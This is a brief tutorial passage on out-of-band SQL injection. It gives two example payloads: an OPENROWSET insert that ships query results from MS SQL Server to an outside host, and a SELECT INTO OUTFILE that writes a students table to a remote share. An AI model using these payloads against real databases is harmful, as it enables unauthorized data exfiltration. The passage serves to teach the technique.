Recapitulating, out-band SQL injections do not show the result to the user directly. So, you need a second channel to get a result, sometimes another data store or a network service.

The following is a common example used to exploit MS SQL Server-based vulnerabilities, which connect to another server to send the results to this new server:

    INSERT INTO openrowset('SQLOLEDB', 'DRIVER={SQL Server};SERVER=bigshot.beer,80;UID=sa;PWD=abretesesamo', 'SELECT * FROM students') values (@@version)

Another useful possibility is if you have remote access to the server, or you can extract information from it, and send the result to a file:

    SELECT * INTO outfile '\\192.168.0.45\share\pwned.txt' FROM students;